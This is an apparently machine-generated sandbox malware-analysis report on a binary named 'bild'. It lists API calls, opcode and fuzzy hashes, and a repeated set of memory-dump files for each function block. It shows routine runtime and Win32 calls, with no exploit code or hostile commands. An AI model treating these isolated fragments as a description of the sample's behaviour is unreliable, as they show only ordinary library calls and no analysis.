                                                                                  • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                  • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                  • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                  • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 11074E1F
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1654520187-0
                                                                                  • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                  • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                  • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                  • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                  APIs
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                  • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1338273076-0
                                                                                  • Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                  • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                  • Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                  • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _malloc_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1183979061-0
                                                                                  • Opcode ID: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                  • Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
                                                                                  • Opcode Fuzzy Hash: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                  • Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 110883EF
                                                                                  • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection_memset
                                                                                  • String ID:
                                                                                  • API String ID: 453477542-0
                                                                                  • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                  • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                  • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                  • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                  • ExtractIconExA.SHELL32(?,00000000,0002049B,00020493,00000001), ref: 11144498
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExtractFileIconModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 3911389742-0
                                                                                  • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                  • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                  • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                  • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                  APIs
                                                                                    • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                  • __lock_file.LIBCMT ref: 11163DFE
                                                                                    • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                  • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2800547568-0
                                                                                  • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                  • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                  • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                  • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                  APIs
                                                                                    • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                    • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                  • GetLastError.KERNEL32(?,02B6B888,000000FF,?), ref: 11144ED5
                                                                                  • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02B6B888,000000FF,?), ref: 11144EE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                  • String ID:
                                                                                  • API String ID: 3768737497-0
                                                                                  • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                  • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                  • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                  • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LockitLockit::_std::_
                                                                                  • String ID:
                                                                                  • API String ID: 3382485803-0
                                                                                  • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                  • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                  • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                  • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                  APIs
                                                                                  • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75A78400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                  • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                  • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                  • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                  • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                  • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                  • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                    • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 328603210-0
                                                                                  • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                  • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                  • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                  • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
